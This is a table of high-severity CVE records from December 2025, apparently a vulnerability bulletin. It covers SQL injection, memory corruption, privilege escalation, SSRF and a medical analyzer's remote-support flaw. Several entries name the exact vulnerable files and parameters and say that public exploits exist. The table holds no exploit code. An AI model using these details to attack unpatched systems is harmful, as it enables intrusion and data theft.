| Radiometer Medical Aps--ABL90 FLEX and ABL90 FLEX PLUS Analyzers | A vulnerability in the application software of multiple Radiometer products may allow remote code execution and unauthorized device management when specific internal conditions are met. Exploitation requires that a remote connection is established with additional information obtained through other means. The issue is caused by a weakness in the analyzer's application software. Other related CVEs are CVE-2025-14095 and CVE-2025-14096. Affected customers have been informed about this vulnerability. This CVE is being published to provide transparency. Required configuration for exposure: an affected application software version is in use and the remote support feature is enabled in the analyzer. Temporary workaround: if the network is not considered secure, remove the analyzer from the network. Permanent solution: customers should ensure that the network is secure and that access follows best practices; local Radiometer representatives will contact all affected customers to discuss a permanent solution. Exploit status: researchers have provided a working proof-of-concept (PoC). Radiometer is not aware of any publicly available exploits at the time of this publication. | 2025-12-17 | 7.2 | CVE-2025-14097 | https://www.radiometer.com/myradiometer |
| GG Soft Software Services Inc.--PaperWork | Authorization Bypass Through User-Controlled Key vulnerability in GG Soft Software Services Inc. PaperWork allows Exploitation of Trusted Identifiers. This issue affects PaperWork: from 5.2.0.9427 before 6.0. | 2025-12-17 | 7.1 | CVE-2025-14101 | https://www.usom.gov.tr/bildirim/tr-25-0464 |
| Advantech--SUSI | An Improper Access Control vulnerability in Advantech SUSI driver (susi.sys) allows attackers to read/write arbitrary memory, I/O ports, and MSRs, resulting in privilege escalation, arbitrary code execution, and information disclosure. This issue affects Advantech SUSI: 5.0.24335 and prior. | 2025-12-16 | 7.8 | CVE-2025-14252 | https://www.txone.com/psirt/advisories/CVE-2025-14252 |
| Acer--ListCheck.exe | ListCheck.exe developed by Acer has a Local Privilege Escalation vulnerability. Authenticated local attackers can replace ListCheck.exe with a malicious executable of the same name, which will be executed by the system and result in privilege escalation. | 2025-12-17 | 7.8 | CVE-2025-14305 | https://www.twcert.org.tw/tw/cp-132-10580-01ad5-1.html https://www.twcert.org.tw/en/cp-139-10581-16346-2.html |
| wpdevelop--Booking Calendar | The Booking Calendar plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'dates_to_check' parameter in all versions up to, and including, 10.14.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2025-12-15 | 7.5 | CVE-2025-14383 | https://www.wordfence.com/threat-intel/vulnerabilities/id/790f93b0-eb69-473f-a726-bfe215f5d870?source=cve https://plugins.trac.wordpress.org/changeset/3416518/booking/trunk/includes/_capacity/capacity.php |
| wpmudev--Hummingbird Performance Cache & Page Speed Optimization for Core Web Vitals \| Critical CSS \| Minify CSS \| Defer CSS Javascript \| CDN | The Hummingbird Performance plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.18.0 via the 'request' function. This makes it possible for unauthenticated attackers to extract sensitive data including Cloudflare API credentials. | 2025-12-18 | 7.5 | CVE-2025-14437 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8755ab3f-ee77-44ea-8620-590f1f1cb333?source=cve https://plugins.trac.wordpress.org/changeset/3421187/hummingbird-performance |
| AWS--Harmonix on AWS | An overly-permissive IAM trust policy in the Harmonix on AWS framework may allow IAM principals in the same AWS account to escalate privileges via role assumption. The sample code for the EKS environment provisioning role is configured to trust the account root principal, which may enable any IAM principal in the same AWS account with sts:AssumeRole permissions to assume the role with administrative privileges. We recommend customers upgrade to Harmonix on AWS v0.4.2 or later if you have deployed the framework using versions v0.3.0 through v0.4.1. | 2025-12-15 | 7.2 | CVE-2025-14503 | https://github.com/awslabs/harmonix/pull/189 https://aws.amazon.com/security/security-bulletins/AWS-2025-031/ https://github.com/awslabs/harmonix/security/advisories/GHSA-qm86-gqrq-mqcw |
| Autodesk--Shared Components | A maliciously crafted CATPART file, when parsed through certain Autodesk products, can force an Out-of-Bounds Read vulnerability. A malicious actor can leverage this vulnerability to cause a crash, read sensitive data, or execute arbitrary code in the context of the current process. | 2025-12-15 | 7.8 | CVE-2025-14593 | https://www.autodesk.com/products/autodesk-access/overview https://www.autodesk.com/trust/security-advisories/adsk-sa-2025-0024 |
| Arcadia Technology, LLC--Crafty Controller | An input neutralization vulnerability in the Server MOTD component of Crafty Controller allows a remote, unauthenticated attacker to perform stored XSS via server MOTD modification. | 2025-12-17 | 7.1 | CVE-2025-14701 | GitLab Issue #647 |
| Shiguangwu--sgwbox N3 | A vulnerability was found in Shiguangwu sgwbox N3 2.0.25. The impacted element is an unknown function of the file /eshell of the component API. The manipulation results in path traversal. It is possible to launch the attack remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-15 | 7.3 | CVE-2025-14704 | VDB-336421 (Shiguangwu sgwbox N3 API eshell path traversal); VDB-336421 (CTI Indicators: IOB, IOC, TTP, IOA); Submit #706915 (sgwbox N3 NAS V2.0.25 Directory Traversal); https://www.notion.so/sgwbox-NAS-N3-Directory-Traversal-2be6cf4e528a802a9c0ad6f01b75694e?source=copy_link |
| FantasticLBP--Hotels Server | A vulnerability was detected in FantasticLBP Hotels Server up to 67b44df162fab26df209bd5d5d542875fcbec1d0. This affects an unknown part of the file /controller/api/OrderList.php. The manipulation of the argument telephone results in SQL injection. The attack can be executed remotely. The exploit is now public and may be used. This product implements a rolling release for ongoing delivery, which means version information for affected or updated releases is unavailable. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-15 | 7.3 | CVE-2025-14710 | VDB-336427 (FantasticLBP Hotels Server OrderList.php sql injection); VDB-336427 (CTI Indicators: IOB, IOC, TTP, IOA); Submit #707082 (GitHub/FantasticLBP Hotels_Server master-67b44df162fab26df209bd5d5d542875fcbec1d0 SQL Injection); https://github.com/navex2/CVE/issues/3 |
| FantasticLBP--Hotels Server | A flaw has been found in FantasticLBP Hotels Server up to 67b44df162fab26df209bd5d5d542875fcbec1d0. This vulnerability affects unknown code of the file /controller/api/hotelList.php. This manipulation of the argument pickedHotelName/type causes SQL injection. The attack can be carried out remotely. The exploit has been published and may be used. This product adopts a rolling release strategy to maintain continuous delivery, so version information for affected or updated releases is unavailable. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-15 | 7.3 | CVE-2025-14711 | VDB-336428 (FantasticLBP Hotels Server hotelList.php sql injection); VDB-336428 (CTI Indicators: IOB, IOC, TTP, IOA); Submit #707083 (GitHub/FantasticLBP Hotels_Server master-67b44df162fab26df209bd5d5d542875fcbec1d0 SQL Injection); Submit #707085 (GitHub/FantasticLBP Hotels_Server master-67b44df162fab26df209bd5d5d542875fcbec1d0 SQL Injection, duplicate); https://github.com/navex2/CVE/issues/1 https://github.com/navex2/CVE/issues/2 |
| JHENG GAO--Student Learning Assessment and Support System | Student Learning Assessment and Support System developed by JHENG GAO has an Exposure of Sensitive Information vulnerability, allowing unauthenticated remote attackers to view a specific page and obtain test accounts and passwords. | 2025-12-15 | 7.5 | CVE-2025-14712 | https://www.twcert.org.tw/tw/cp-132-10570-72e31-1.html https://www.twcert.org.tw/en/cp-139-10571-a0c2a-2.html |
| The Browser Company of New York--ArcSearch | ArcSearch for Android versions prior to 1.12.6 could display a different domain in the address bar than the content being shown, enabling address bar spoofing after user interaction via crafted web content. | 2025-12-19 | 7.4 | CVE-2025-14809 | https://arc.net/security/bulletins#cve-2025-14809-address-bar-spoofing-risk-navigation-trigger-uri-confusion-on-arcsearch-android |
| The Browser Company of New York--ArcSearch | ArcSearch for iOS versions prior to 1.45.2 could display a different domain in the address bar than the content being shown after an iframe-triggered URI-scheme navigation, increasing spoofing risk. | 2025-12-19 | 7.5 | CVE-2025-14812 | https://arc.net/security/bulletins#cve-2025-14812-address-bar-spoofing-risk-iframe-triggered-uri-navigation-on-arc-search-ios |
| itsourcecode--Online Cake Ordering System | A vulnerability was identified in itsourcecode Online Cake Ordering System 1.0. The affected element is an unknown function of the file /updateproduct.php?action=edit. Such manipulation of the argument ID leads to SQL injection. It is possible to launch the attack remotely. The exploit is publicly available and might be used. | 2025-12-17 | 7.3 | CVE-2025-14832 | VDB-336981 (itsourcecode Online Cake Ordering System updateproduct.php sql injection); VDB-336981 (CTI Indicators: IOB, IOC, TTP, IOA); Submit #715063 (itsourcecode Online Cake Ordering System V1.0 SQL Injection); https://github.com/ZhangYu-del/cve/issues/1 https://itsourcecode.com/ |
| code-projects--Online Appointment Booking System | A security flaw has been discovered in code-projects Online Appointment Booking System 1.0. The impacted element is an unknown function of the file /admin/deletemanagerclinic.php. Performing manipulation of the argument clinic results in SQL injection. The attack can be initiated remotely. The exploit has been released to the public and may be exploited. | 2025-12-17 | 7.3 | CVE-2025-14833 | VDB-336982 (code-projects Online Appointment Booking System deletemanagerclinic.php sql injection); VDB-336982 (CTI Indicators: IOB, IOC, TTP, IOA); Submit #715073 (code-projects Online Appointment Booking System V1.0 SQL injection); https://github.com/Sqli22/Sqli/issues/2 https://code-projects.org/ |
| MongoDB Inc.--MongoDB Server | Mismatched length fields in Zlib compressed protocol headers may allow a read of uninitialized heap memory by an unauthenticated client. This issue affects all MongoDB Server v7.0 prior to 7.0.28 versions, MongoDB Server v8.0 versions prior to 8.0.17, MongoDB Server v8.2 versions prior to 8.2.3, MongoDB Server v6.0 versions prior to 6.0.27, MongoDB Server v5.0 versions prior to 5.0.32, MongoDB Server v4.4 versions prior to 4.4.30, MongoDB Server v4.2 versions greater than or equal to 4.2.0, MongoDB Server v4.0 versions greater than or equal to 4.0.0, and MongoDB Server v3.6 versions greater than or equal to 3.6.0. | 2025-12-19 | 7.5 | CVE-2025-14847 | https://jira.mongodb.org/browse/SERVER-115508 |
| brainstormforce--SureForms Contact Form, Payment Form & Other Custom Form Builder | The SureForms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the form field parameters in all versions up to, and including, 2.2.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-21 | 7.2 | CVE-2025-14855 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5e493f01-95db-48ba-8daf-d7ff69df29bf?source=cve https://plugins.trac.wordpress.org/browser/sureforms/tags/2.2.0/assets/build/entries.js https://plugins.trac.wordpress.org/changeset/3423684/sureforms |
| Campcodes--Supplier Management System | A vulnerability was identified in Campcodes Supplier Management System 1.0. This affects an unknown function of the file /admin/add_retailer.php. The manipulation of the argument cmbAreaCode leads to SQL injection. The attack can be carried out remotely. The exploit is publicly available and might be used. | 2025-12-18 | 7.3 | CVE-2025-14877 | VDB-337368 (Campcodes Supplier Management System add_retailer.php sql injection); VDB-337368 (CTI Indicators: IOB, IOC, TTP, IOA); Submit #715326 (Campcodes Supplier Management System V1.0 SQL Injection); https://github.com/ProgramShowMaker/CVE/issues/6 https://www.campcodes.com/ |
| D-Link--DIR-605 | A vulnerability was detected in D-Link DIR-605 202WWB03. Affected by this issue is some unknown functionality of the component Firmware Update Service. Performing manipulation results in command injection. The attack can be initiated remotely. The exploit is now public and may be used. This vulnerability only affects products that are no longer supported by the maintainer. | 2025-12-18 | 7.2 | CVE-2025-14884 | VDB-337372 (D-Link DIR-605 Firmware Update Service command injection); VDB-337372 (CTI Indicators: IOB, IOC, TTP); Submit #715465 (D-Link DIR605 B1v202WWB03 Command Injection); https://tzh00203.notion.site/D-Link-DIR605-B1v202WWB03-Command-Injection-in-Firmware-Update-2cab5c52018a80de8df7f427ac2faf0e?source=copy_link https://www.dlink.com/ |
| yuzutech--kroki | Kroki is vulnerable to server-side request forgery due to insufficient sanitization in Vega's `convert()` function when `safeMode` is enabled and the spec variable is an array. An attacker can craft a malicious Vega diagram specification that allows them to send requests to any URL, including local file system paths, leading to exposure of sensitive information. | 2025-12-18 | 7.5 | CVE-2025-14896 | https://github.com/yuzutech/kroki/commit/f31093cd8a0a1d6999c43d560f62d1e82d59c77e |
| code-projects--Scholars Tracking System | A vulnerability was determined in code-projects Scholars Tracking System 1.0. The affected element is an unknown function of the file /admin/delete_user.php. This manipulation of the argument ID causes SQL injection. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized. | 2025-12-19 | 7.3 | CVE-2025-14940 | VDB-337520 (code-projects Scholars Tracking System delete_user.php sql injection); VDB-337520 (CTI Indicators: IOB, IOC, TTP, IOA); Submit #716120 (code-projects Scholars Tracking System V1.0 SQL Injection); https://github.com/gx922/CVE/issues/1 https://code-projects.org/ |
| code-projects--Scholars Tracking System | A weakness has been identified in code-projects Scholars Tracking System 1.0. The affected element is an unknown function of the file /delete_post.php. This manipulation of the argument ID causes SQL injection. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be exploited. | 2025-12-19 | 7.3 | CVE-2025-14950 | VDB-337586 (code-projects Scholars Tracking System delete_post.php sql injection); VDB-337586 (CTI Indicators: IOB, IOC, TTP, IOA); Submit #716123 (code-projects Scholars Tracking System V1.0 SQL Injection); https://github.com/gx922/CVE/issues/2 https://code-projects.org/ |
| code-projects--Scholars Tracking System | A security vulnerability has been detected in code-projects Scholars Tracking System 1.0. The impacted element is an unknown function of the file /home.php. Such manipulation of the argument post_content leads to SQL injection. The attack can be executed remotely. The exploit has been disclosed publicly and may be used. | 2025-12-19 | 7.3 | CVE-2025-14951 | VDB-337587 (code-projects Scholars Tracking System home.php sql injection); VDB-337587 (CTI Indicators: IOB, IOC, TTP, IOA); Submit #716185 (code-projects Scholars Tracking System V1.0 SQL Injection); https://github.com/gx922/CVE/issues/3 https://code-projects.org/ |
| Campcodes--Supplier Management System | A vulnerability was detected in Campcodes Supplier Management System 1.0. This affects an unknown function of the file /admin/add_category.php. Performing manipulation of the argument txtCategoryName results in SQL injection. The attack can be carried out remotely. The exploit is now public and may be used. | 2025-12-19 | 7.3 | CVE-2025-14952 | VDB-337588 (Campcodes Supplier Management System add_category.php sql injection); VDB-337588 (CTI Indicators: IOB, IOC, TTP, IOA); Submit #716440 (Campcodes Supplier Management System V1.0 SQL Injection); https://github.com/vivibiubiu/CVE/issues/1 https://www.campcodes.com/ |
| code-projects--Simple Stock System | A weakness has been identified in code-projects Simple Stock System 1.0. This issue affects some unknown processing of the file /market/signup.php. Executing manipulation of the argument Username can lead to SQL injection. The attack may be launched remotely. The exploit has been made available to the public and could be exploited. | 2025-12-19 | 7.3 | CVE-2025-14959 | VDB-337595 (code-projects Simple Stock System signup.php sql injection); VDB-337595 (CTI Indicators: IOB, IOC, TTP, IOA); Submit #717344 (code-projects Simple Stock System V1.0 SQL Injection); https://github.com/InorSogeih/Inor/issues/1 https://code-projects.org/ |
| code-projects--Simple Blood Donor Management System | A security vulnerability has been detected in code-projects Simple Blood Donor Management System 1.0. Impacted is an unknown function of the file /editeddonor.php. The manipulation of the argument Name leads to SQL injection. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used. | 2025-12-19 | 7.3 | CVE-2025-14960 | VDB-337596 (code-projects Simple Blood Donor Management System editeddonor.php sql injection); VDB-337596 (CTI Indicators: IOB, IOC, TTP, IOA); Submit #717374 (code-projects Simple Blood Donor Management System V1.0 SQL Injection); https://github.com/lei-loveling/CVE/issues/1 https://code-projects.org/ |
| code-projects--Simple Blood Donor Management System | A vulnerability was detected in code-projects Simple Blood Donor Management System 1.0. The affected element is an unknown function of the file /editedcampaign.php. The manipulation of the argument campaignname results in SQL injection. The attack can be executed remotely. The exploit is now public and may be used. | 2025-12-19 | 7.3 | CVE-2025-14961 | VDB-337597 (code-projects Simple Blood Donor Management System editedcampaign.php sql injection); VDB-337597 (CTI Indicators: IOB, IOC, TTP, IOA); Submit #717584 (code-projects Simple Blood Donor Management System V1.0 SQL Injection); https://github.com/lei-loveling/CVE/issues/2 https://code-projects.org/ |
| itsourcecode--Student Management System | A vulnerability was identified in itsourcecode Student Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /candidates_report.php. The manipulation of the argument school_year leads to SQL injection. The attack can be initiated remotely. The exploit is publicly available and might be used. | 2025-12-19 | 7.3 | CVE-2025-14967 | VDB-337602 (itsourcecode Student Management System candidates_report.php sql injection); VDB-337602 (CTI Indicators: IOB, IOC, TTP, IOA); Submit #718414 (itsourcecode Student Management System V1.0 SQL Injection); https://github.com/ltranquility/CVE/issues/28 https://itsourcecode.com/ |
| code-projects--Simple Stock System | A security flaw has been discovered in code-projects Simple Stock System 1.0. Affected by this issue is some unknown functionality of the file /market/update.php. The manipulation of the argument email results in SQL injection. The attack can be launched remotely. The exploit has been released to the public and may be exploited. | 2025-12-19 | 7.3 | CVE-2025-14968 | VDB-337603 (code-projects Simple Stock System update.php sql injection); VDB-337603 (CTI Indicators: IOB, IOC, TTP, IOA); Submit #718433 (Code-projects Simple Stock System v1.0 SQL injection); https://github.com/z2sw57y/CVE/issues/1 https://code-projects.org/ |
| Campcodes--Complete Online Beauty Parlor Management System | A vulnerability was identified in Campcodes Complete Online Beauty Parlor Management System 1.0. This issue affects some unknown processing of the file /admin/search-invoices.php. Such manipulation leads to SQL injection. The attack can be launched remotely. The exploit is publicly available and might be used. | 2025-12-20 | 7.3 | CVE-2025-14989 | VDB-337683 (Campcodes Complete Online Beauty Parlor Management System search-invoices.php sql injection); VDB-337683 (CTI Indicators: IOB, IOC, TTP, IOA); Submit #718452 (campcodes Complete Online Beauty Parlor Management System V1.0 SQL Injection); https://github.com/funnnxxx/my-cve/issues/3 https://www.campcodes.com/ |
| Campcodes--Complete Online Beauty Parlor Management System | A security flaw has been discovered in Campcodes Complete Online Beauty Parlor Management System 1.0. Impacted is an unknown function of the file /admin/view-appointment.php. Performing manipulation of the argument viewid results in SQL injection. The attack may be initiated remotely. The exploit has been released to the public and may be exploited. | 2025-12-21 | 7.3 | CVE-2025-14990 | VDB-337684 (Campcodes Complete Online Beauty Parlor Management System view-appointment.php sql injection); VDB-337684 (CTI Indicators: IOB, IOC, TTP, IOA); Submit #718453 (campcodes Complete Online Beauty Parlor Management System V1.0 SQL Injection); https://github.com/funnnxxx/my-cve/issues/2 https://www.campcodes.com/ |
| SeaCMS--SeaCMS | A vulnerability has been found in SeaCMS up to 13.3. The affected element is an unknown function of the file js/player/dmplayer/dmku/class/mysqli.class.php. Such manipulation of the argument page/limit leads to SQL injection. The attack can be executed remotely. The exploit has been disclosed to the public and may be used. | 2025-12-21 | 7.3 | CVE-2025-15002 | VDB-337707 (SeaCMS mysqli.class.php sql injection); VDB-337707 (CTI Indicators: IOB, IOC, TTP, IOA); Submit #716083 (SeaCMS 13.3 SQL Injection); https://note-hxlab.wetolink.com/share/VFwALb6qhnTZ |
| Restajet Information Technologies Inc.--Online Food Delivery System | Cross-Site Request Forgery (CSRF) vulnerability in Restajet Information Technologies Inc. Online Food Delivery System allows Cross Site Request Forgery. This issue affects Online Food Delivery System: through 19122025. | 2025-12-19 | 7.1 | CVE-2025-1927 | https://www.usom.gov.tr/bildirim/tr-25-0469 |
| Qualcomm, Inc.--Snapdragon | Memory corruption during video playback when video session open fails with time out error. | 2025-12-18 | 7.8 | CVE-2025-27063 | https://docs.qualcomm.com/product/publicresources/securitybulletin/december-2025-bulletin.html |
| NVIDIA--NeMo Framework | NVIDIA NeMo Framework contains a vulnerability in model loading that could allow an attacker to exploit improper control mechanisms if a user loads a maliciously crafted file. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, denial of service, and data tampering. | 2025-12-16 | 7.3 | CVE-2025-33212 | https://nvd.nist.gov/vuln/detail/CVE-2025-33212 https://www.cve.org/CVERecord?id=CVE-2025-33212 https://nvidia.custhelp.com/app/answers/detail/a_id/5736 |
| NVIDIA--NeMo Framework | NVIDIA NeMo Framework for all platforms contains a vulnerability where malicious data created by an attacker may cause a code injection. A successful exploit of this vulnerability may lead to code execution, escalation of privileges, information disclosure, and data tampering. | 2025-12-16 | 7.8 | CVE-2025-33226 | https://nvd.nist.gov/vuln/detail/CVE-2025-33226 https://www.cve.org/CVERecord?id=CVE-2025-33226 https://nvidia.custhelp.com/app/answers/detail/a_id/5736 |
| NVIDIA--Resiliency Extension | NVIDIA Resiliency Extension for Linux contains a vulnerability in the checkpointing core, where an attacker may cause a race condition. A successful exploit of this vulnerability might lead to information disclosure, data tampering, denial of service, or escalation of privileges. | 2025-12-16 | 7.8 | CVE-2025-33235 | https://nvd.nist.gov/vuln/detail/CVE-2025-33235 https://www.cve.org/CVERecord?id=CVE-2025-33235 https://nvidia.custhelp.com/app/answers/detail/a_id/5746 |
| Qualcomm, Inc.--Snapdragon | Memory corruption while processing MFC channel configuration during music playback. | 2025-12-18 | 7.8 | CVE-2025-47320 | https://docs.qualcomm.com/product/publicresources/securitybulletin/december-2025-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory corruption while copying packets received from unix clients. | 2025-12-18 | 7.8 | CVE-2025-47321 | https://docs.qualcomm.com/product/publicresources/securitybulletin/december-2025-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory corruption while handling IOCTL calls to set mode. | 2025-12-18 | 7.8 | CVE-2025-47322 | https://docs.qualcomm.com/product/publicresources/securitybulletin/december-2025-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory corruption while routing GPR packets between user and root when handling large data packet. | 2025-12-18 | 7.8 | CVE-2025-47323 | https://docs.qualcomm.com/product/publicresources/securitybulletin/december-2025-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory corruption while handling concurrent memory mapping and unmapping requests from a user-space application. | 2025-12-18 | 7.8 | CVE-2025-47350 | https://docs.qualcomm.com/product/publicresources/securitybulletin/december-2025-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory corruption while loading an invalid firmware in boot loader. | 2025-12-18 | 7.8 | CVE-2025-47382 | https://docs.qualcomm.com/product/publicresources/securitybulletin/december-2025-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory Corruption when processing IOCTLs for JPEG data without verification. | 2025-12-18 | 7.8 | CVE-2025-47387 | https://docs.qualcomm.com/product/publicresources/securitybulletin/december-2025-bulletin.html |
| Grassroot DICOM--Grassroot DICOM | An out-of-bounds read vulnerability exists in the RLECodec::DecodeByStreams functionality of Grassroot DICOM 3.024. A specially crafted DICOM file can lead to leaking heap data. An attacker can provide a malicious file to trigger this vulnerability. | 2025-12-16 | 7.4 | CVE-2025-48429 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2214 |
| Grassroot DICOM--Grassroot DICOM | An out-of-bounds read vulnerability exists in the Overlay::GrabOverlayFromPixelData functionality of Grassroot DICOM 3.024. A specially crafted DICOM file can lead to an information leak. An attacker can provide a malicious file to trigger this vulnerability. | 2025-12-16 | 7.4 | CVE-2025-52582 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2211 |
| Fuji Electric--Monitouch V-SFT-6 | Fuji Electric Monitouch V-SFT-6 is vulnerable to an out-of-bounds write while processing a specially crafted project file, which may allow an attacker to execute arbitrary code. | 2025-12-17 | 7.8 | CVE-2025-53524 | https://felib.fujielectric.co.jp/en/document_search?tab=software&document1%5B1%5D=M10009&document2%5B1%5D=M20104&product1%5B1%5D=P10003&product2%5B1%5D=P20023&product3%5B1%5D=P30623&product4%5B1%5D=S11133&discontinued%5B1%5D=0&count=20&sort=en_title&page=1&region=en-glb https://www.cisa.gov/news-events/ics-advisories/icsa-25-308-01 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-308-01.json |
| Grassroot DICOM--Grassroot DICOM | An out-of-bounds read vulnerability exists in the JPEGBITSCodec::InternalCode functionality of Grassroot DICOM 3.024. A specially crafted DICOM file can lead to an information leak. An attacker can provide a malicious file to trigger this vulnerability. The function `grayscale_convert` is called based on the value in the malicious DICOM file that specifies the intended interpretation of the image pixel data. | 2025-12-16 | 7.4 | CVE-2025-53618 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2210 |
| Grassroot DICOM--Grassroot DICOM | An out-of-bounds read vulnerability exists in the JPEGBITSCodec::InternalCode functionality of Grassroot DICOM 3.024. A specially crafted DICOM file can lead to an information leak. An attacker can provide a malicious file to trigger this vulnerability. The function `null_convert` is called based on the value in the malicious DICOM file that specifies the intended interpretation of the image pixel data. | 2025-12-16 | 7.4 | CVE-2025-53619 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2210 |
| Palantir--com.palantir.compute:compute-service | Due to a product misconfiguration in certain deployment types, it was possible from different pods in the same namespace to communicate with each other. This issue resulted in bypass of access control due to the presence of a vulnerable endpoint in Foundry Container Service that executed user-controlled commands locally. | 2025-12-18 | 7.5 | CVE-2025-53710 | https://palantir.safebase.us/?tcuUid=4dbae101-79da-433c-8184-c70b78f4701b |
| BullWall--Ransomware Containment | BullWall Ransomware Containment does not fully inspect a file when determining whether it has been encrypted by ransomware. An authenticated attacker could bypass detection by encrypting a file and leaving the first four bytes unaltered. Versions 4.6.0.0, 4.6.0.6, 4.6.0.7, and 4.6.1.4 were confirmed to be affected; other versions before and after may also be affected. | 2025-12-18 | 7.1 | CVE-2025-62000 | |
| NI--LabVIEW | There is an out of bounds write vulnerability in NI LabVIEW in mgocre_SH_25_3!RevBL() when parsing a corrupted VI file. This vulnerability may result in information disclosure or arbitrary code execution. Successful exploitation requires an attacker to get a user to open a specially crafted VI. This vulnerability affects NI LabVIEW 2025 Q3 (25.3) and prior versions. | 2025-12-18 | 7.8 | CVE-2025-64461 | https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/multiple-memory-corruption-vulnerabilities-in-ni-labview.html |
| NI--LabVIEW | There is an out of bounds read vulnerability in NI LabVIEW in LVResFile::RGetMemFileHandle() when parsing a corrupted VI file. This vulnerability may result in information disclosure or arbitrary code execution. Successful exploitation requires an attacker to get a user to open a specially crafted VI. This vulnerability affects NI LabVIEW 2025 Q3 (25.3) and prior versions. | 2025-12-18 | 7.8 | CVE-2025-64462 | https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/multiple-memory-corruption-vulnerabilities-in-ni-labview.html |
| NI--LabVIEW | There is an out of bounds read vulnerability in NI LabVIEW in LVResource::DetachResource() when parsing a corrupted VI file. This vulnerability may result in information disclosure or arbitrary code execution. Successful exploitation requires an attacker to get a user to open a specially crafted VI. This vulnerability affects NI LabVIEW 2025 Q3 (25.3) and prior versions. | 2025-12-18 | 7.8 | CVE-2025-64463 | https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/multiple-memory-corruption-vulnerabilities-in-ni-labview.html |
| NI--LabVIEW | There is an out of bounds read vulnerability in NI LabVIEW in lvre!VisaWriteFromFile() when parsing a corrupted VI file. This vulnerability may result in information disclosure or arbitrary code execution. Successful exploitation requires an attacker to get a user to open a specially crafted VI. This vulnerability affects NI LabVIEW 2025 Q3 (25.3) and prior versions. | 2025-12-18 | 7.8 | CVE-2025-64464 | https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/multiple-memory-corruption-vulnerabilities-in-ni-labview.html |
| NI--LabVIEW | There is an out of bounds read vulnerability in NI LabVIEW in lvre!DataSizeTDR() when parsing a corrupted VI file. This vulnerability may result in information disclosure or arbitrary code execution. Successful exploitation requires an attacker to get a user to open a specially crafted VI. This vulnerability affects NI LabVIEW 2025 Q3 (25.3) and prior versions. | 2025-12-18 | 7.8 | CVE-2025-64465 | https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/multiple-memory-corruption-vulnerabilities-in-ni-labview.html |
| NI--LabVIEW | There is an out of bounds read vulnerability in NI LabVIEW in lvre!ExecPostedProcRecPost() when parsing a corrupted VI file. This vulnerability may result in information disclosure or arbitrary code execution. Successful exploitation requires an attacker to get a user to open a specially crafted VI. This vulnerability affects NI LabVIEW 2025 Q3 (25.3) and prior versions. | 2025-12-18 | 7.8 | CVE-2025-64466 | https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/multiple-memory-corruption-vulnerabilities-in-ni-labview.html |
| NI--LabVIEW | There is an out of bounds read vulnerability in NI LabVIEW in LVResFile::FindRsrcListEntry() when parsing a corrupted VI file. This vulnerability may result in information disclosure or arbitrary code execution. Successful exploitation requires an attacker to get a user to open a specially crafted VI. This vulnerability affects NI LabVIEW 2025 Q3 (25.3) and prior versions. | 2025-12-18 | 7.8 | CVE-2025-64467 | https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/multiple-memory-corruption-vulnerabilities-in-ni-labview.html |
| NI--LabVIEW | There is a use-after-free vulnerability in NI LabVIEW in sentry!sentry_span_set_data() when parsing a corrupted VI file. This vulnerability may result in information disclosure or arbitrary code execution. Successful exploitation requires an attacker to get a user to open a specially crafted VI. This vulnerability affects NI LabVIEW 2025 Q3 (25.3) and prior versions. | 2025-12-18 | 7.8 | CVE-2025-64468 | https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/multiple-memory-corruption-vulnerabilities-in-ni-labview.html |
| NI--LabVIEW | There is a stack-based buffer overflow vulnerability in NI LabVIEW in LVResFile::FindRsrcListEntry() when parsing a corrupted VI file. This vulnerability may result in information disclosure or arbitrary code execution. Successful exploitation requires an attacker to get a user to open a specially crafted VI. This vulnerability affects NI LabVIEW 2025 Q3 (25.3) and prior versions. | 2025-12-18 | 7.8 | CVE-2025-64469 | https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/multiple-memory-corruption-vulnerabilities-in-ni-labview.html |
| Microsoft--Microsoft Purview | Path traversal ('.../...//', CWE-35) in Microsoft Purview allows an authorized attacker to execute code over a network. | 2025-12-18 | 7.2 | CVE-2025-64676 | Microsoft Purview eDiscovery Remote Code Execution Vulnerability |
